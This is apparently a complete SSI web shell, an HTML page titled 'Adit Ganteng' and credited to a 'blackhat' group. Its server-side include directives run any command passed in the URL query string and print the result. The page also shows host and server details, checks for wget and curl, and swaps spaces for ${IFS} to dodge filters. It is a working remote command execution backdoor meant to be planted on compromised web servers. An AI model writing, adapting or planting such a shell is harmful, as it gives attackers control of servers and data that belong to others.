<!--#config errmsg="[ERROR] SSI DISABLED"-->
<!--#set var="zero" value="" -->
<!--#if expr="$QUERY_STRING_UNESCAPED = $zero" -->
<!--#set var="shl" value="id" -->
<!--#else -->
<!--#set var="shl" value=$QUERY_STRING_UNESCAPED -->
<!--#endif -->
<!DOCTYPE html>
<html>
<head>
<title>Adit Ganteng</title>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script language="javascript">
function opetcmd()
{
  var uri = document.getElementById('command').value;
    var rep = uri.replace(/[ ]/g,'${IFS}');
    var res = encodeURI(uri);
    document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+encodeURI(rep);
}
</script>
</head>
<table class="directory-listing-table"><thead><td>
  <font face="courier">
    <br><br>System : <b><font color="orange"><!--#exec cmd="{uname,-nrv}" --></font></b>
    <br>Software : <b><font color="orange"><!--#echo var="SERVER_SOFTWARE" --></font></b>
    <br>Server Ip : <b><font color="orange"><!--#echo var="SERVER_ADDR" --></font></b>
    <br>Name Host : <b><font color="orange"><!--#echo var="HTTP_HOST" -->
</font></b>
    <br>Current Dir : <b><font color="orange"><!--#echo var=DOCUMENT_ROOT --></font></b><br>

Wget : <b><font color="orange"><!--#exec cmd="{test,-e,/usr/bin/wget}&&{echo,ON}||{echo,OFF}" --></font></b> |
Curl : <b><font color="orange"><!--#exec cmd="{test,-e,/usr/bin/curl}&&{echo,ON}||{echo,OFF}" --></font></b>
<br><br>
    <input type="text" size="30" placeholder="uname -a" id="command" class="text" name="address1" style="max-width: 100%; max-height: 100%;">&nbsp;
    <br><br><button class="pencet" style="width:120px;height:30px;" id="crot" onclick="opetcmd();">execute</button><br><br>
Command : </font><b><font face="courier" color="orange" id="cmd"><!--#echo var=shl --></font></b></i>
<pre><textarea style="color:lime;" readonly><!--#exec cmd=$shl --></textarea></pre>
<script>
  var cmd = document.getElementById("cmd").innerHTML.split("${IFS}").join(" ");
    document.getElementById("cmd").innerHTML = cmd;
    var gaskan = document.getElementById("command");
    gaskan.addEventListener("keyup", function(event) {
      if (event.keyCode === 13) {
        event.preventDefault();
        document.getElementById("crot").click();
    }
});
</script>
</td></thead></table><br>
<table class='directory-listing-table'><thead><td><center><font face="courier" size="2">sange brutal &copy; 2025 - <a href='https://www.sukabumiblackhat.com/' target='_blank'></font><font size="2" color="orange">mr.spongebob ganteng</font></a></center></td></thead></table>
</center></td></thead></table>
</html>
